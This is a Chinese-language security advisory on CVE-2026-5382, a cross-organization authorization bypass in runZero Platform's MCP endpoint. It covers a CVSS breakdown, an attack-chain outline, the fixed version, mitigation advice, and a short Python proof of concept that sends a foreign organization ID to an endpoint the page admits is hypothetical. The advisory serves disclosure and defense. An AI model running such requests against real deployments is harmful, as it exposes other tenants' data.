CVE-2026-5382 CVSS 3.0 低危

CVE-2026-5382 runZero Platform信息泄露漏洞

披露日期: 2026-04-07

来源: 44488dab-36db-4358-99f9-bc116477f914

漏洞信息

漏洞编号

CVE-2026-5382

漏洞类型

不正确的授权

CVSS评分

3.0 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

runZero Platform

漏洞概述

runZero Platform存在一个不正确的授权漏洞（CWE-863）。该问题允许具有高权限的攻击者通过网络利用MCP端点，访问授权组织范围之外的记录，导致敏感信息泄露。虽然该漏洞攻击复杂度较高且需要高权限，但仍会对数据隔离性造成风险。厂商已在版本4.0.260206.0中修复此问题。

技术细节

该漏洞的核心在于runZero Platform的MCP（模型上下文协议）端点未能严格实施基于组织范围的访问控制检查。根据CVSS向量，攻击者需要拥有高权限账户（PR:H），这通常意味着攻击者已经突破了一定的防御边界。然而，在处理针对特定数据记录的请求时，系统仅验证了用户的认证状态或通用权限，却未验证该用户是否有权访问请求所指向的特定组织或租户的数据。这种逻辑缺陷属于典型的越权访问漏洞（IDOR/水平越权）。攻击者可以通过构造特定的API请求，指定目标组织ID或利用端点的遍历特性，从而绕过逻辑限制，获取本应隔离的敏感资产信息。

攻击链分析

STEP 1

1. 获取凭证

攻击者首先需要获取runZero平台的一个高权限账户的凭证或会话令牌。

STEP 2

2. 构造恶意请求

利用获取的凭证，向MCP端点发送精心构造的API请求，试图修改组织ID或查询参数以指向非授权范围。

STEP 3

3. 绕过授权检查

服务器端接收请求，由于授权逻辑缺陷，未能正确拦截跨组织的数据访问请求。

STEP 4

4. 获取敏感数据

服务器返回目标记录，攻击者成功获取授权组织范围之外的敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC Concept for CVE-2026-5382
# Description: Exploits Incorrect Authorization to access records outside authorized scope via MCP endpoint.
# Requirements: High privileged token, Network access to target.

import requests

def exploit_poc(target_url, auth_token, target_org_id):
    """
    Attempts to retrieve records from an unauthorized organization scope.
    """
    headers = {
        "Authorization": f"Bearer {auth_token}",
        "Content-Type": "application/json",
        "Accept": "application/json"
    }
    
    # Malicious payload targeting a specific organization ID outside user scope
    # Endpoint structure is hypothetical based on MCP description
    endpoint = f"{target_url}/api/v1/mcp/records"
    
    payload = {
        "scope": "organization",
        "org_id": target_org_id,  # The unauthorized target organization ID
        "query": "*"
    }

    try:
        response = requests.post(endpoint, json=payload, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print("[+] PoC Successful: Authorized access bypassed.")
            print(f"[+] Leaked Data Preview: {response.text[:200]}")
            return True
        else:
            print(f"[-] PoC Failed: Received status code {response.status_code}")
            return False
            
    except Exception as e:
        print(f"[!] Error during exploit: {str(e)}")
        return False

if __name__ == "__main__":
    # Example usage
    target = "https://runzero-target.com"
    token = "<HIGH_PRIVILEGE_TOKEN>"
    rogue_org_id = "target_org_uuid_12345"
    exploit_poc(target, token, rogue_org_id)

影响范围

runZero Platform < 4.0.260206.0

防御指南

临时缓解措施

建议立即升级至修复版本。如无法立即升级，应通过网络访问控制列表（ACL）严格限制对MCP端点的访问，仅允许可信IP连接，并加强对特权账户的监控，防止凭证被滥用导致越权访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表